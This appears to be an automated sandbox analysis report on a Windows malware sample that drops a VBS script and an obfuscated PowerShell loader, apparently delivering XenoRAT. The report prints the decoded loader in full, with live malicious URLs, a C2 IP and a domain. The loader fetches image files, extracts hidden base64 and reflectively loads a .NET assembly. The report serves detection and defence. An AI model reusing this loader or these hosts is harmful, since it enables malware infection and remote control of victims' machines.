            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@G
E@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I
Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67a7e5e159f71.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , ProcessId: 5100, ProcessName: wscript.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67a7e5e159f71.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , ProcessId: 5100, ProcessName: wscript.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67a7e5e159f71.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , ProcessId: 5100, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe, ProcessId: 6736, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function 
DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Conve
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67a7e5e159f71.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" , ProcessId: 5100, ProcessName: wscript.exe
            Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '[obfuscated base64 blob removed; the decoded script appears under Data Obfuscation]'"

            Data Obfuscation

            barindex
            Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -exec
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2025-02-10T19:58:30.985287+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 62.60.226.64 | 80 | 192.168.2.6 | 49759 | TCP
            2025-02-10T19:58:11.329279+0100 | 2057635 | 1 | A Network Trojan was detected | 62.60.226.64 | 80 | 192.168.2.6 | 49759 | TCP
            2025-02-10T19:58:24.723699+0100 | 2049038 | 1 | A Network Trojan was detected | 185.199.108.153 | 443 | 192.168.2.6 | 49711 | TCP


            AV Detection

            barindex
            Source: http://62.60.226.64/public_files/Sjofbrd.txt | Avira URL Cloud: Label: malware
            Source: https://ofice365.github.io/1/test.jpg | Avira URL Cloud: Label: malware
            Source: https://ofice365.github.io | Avira URL Cloud: Label: malware
            Source: 9.2.vbc.exe.400000.0.unpack | Malware Configuration Extractor: XenoRAT {"C2 url": "failed2.myftp.org", "Mutex Name": "Winsock2Mutex", "Install Folder": "appdata"}
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Virustotal: Detection: 41%
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | ReversingLabs: Detection: 39%
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Code function: 0_2_00007FF6A1D830EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF6A1D830EC
            Source: unknown | HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: Vbc.exe, 0000000B.00000000.2276937183.00000000001F1000.00000020.00000001.01000000.0000000A.sdmp, Vbc.exe.9.dr
            Source: Binary string: wextract.pdb source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: Binary string: wextract.pdbGCTL source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe
            Source: Binary string: vbc.pdb source: Vbc.exe, 0000000B.00000000.2276937183.00000000001F1000.00000020.00000001.01000000.0000000A.sdmp, Vbc.exe.9.dr
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Code function: 0_2_00007FF6A1D8204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF6A1D8204C

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 62.60.226.64:80 -> 192.168.2.6:49759
            Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 62.60.226.64:80 -> 192.168.2.6:49759
            Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.108.153:443 -> 192.168.2.6:49711
            Source: Malware configuration extractor | URLs: failed2.myftp.org
            Source: global traffic | HTTP traffic detected: GET /ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113 HTTP/1.1 | Host: bitbucket.org | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /1/test.jpg HTTP/1.1 | Host: ofice365.github.io | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /public_files/Sjofbrd.txt HTTP/1.1 | Host: 62.60.226.64 | Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 185.166.143.49
            Source: Joe Sandbox View | IP Address: 185.199.108.153
            Source: Joe Sandbox View | ASN Name: ASLINE-AS-APASLINELIMITEDHK
            Source: Joe Sandbox View | ASN Name: FASTLYUS
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknown | TCP traffic detected without corresponding DNS query: 62.60.226.64
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
            Source: global traffic | DNS traffic detected: DNS query: ofice365.github.io
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 10 Feb 2025 18:58:19 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 15184 | Server: AtlassianEdge [remaining response headers, a long Content-Security-Policy dump, omitted]
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000005.00000002.2582750813.00000260874C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://admin.atlassian.com
            Source: powershell.exe, 00000005.00000002.2582750813.0000026087457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2582750813.0000026087494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.bitbucket.org
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://atlassianblog.wpuser.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/ad
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/ap
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/entry/ve
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/css/themes/a
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/dist/webpack
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/img/default_
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/img/logos/bi
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/7e618548327d/jsi18n/en/dj
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org
            Source: powershell.exe, 00000005.00000002.2582750813.00000260879DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D3DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D36F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031EE11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276617831.000002031D350000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2278924771.000002031D630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279013760.000002031D664000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/gateway/api/emoji/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.status.atlassian.com/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bqlf8qjztdtr.statuspage.io
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cookielaw.org/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F1F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F038000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/login
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fccccccccccccn
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/logout
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F212000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/manage-profile/
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://id.atlassian.com/profile/rest/profile&quot;
            Source: powershell.exe, 00000007.00000002.2279450210.000002031F216000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ofice365.github.io
